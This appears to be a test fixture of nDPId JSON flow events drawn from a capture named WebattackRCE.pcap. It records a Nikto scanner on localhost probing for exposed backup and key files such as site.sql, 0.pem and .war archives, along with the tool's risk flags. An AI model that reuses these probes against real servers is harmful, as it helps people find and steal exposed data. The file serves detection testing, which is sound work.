00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
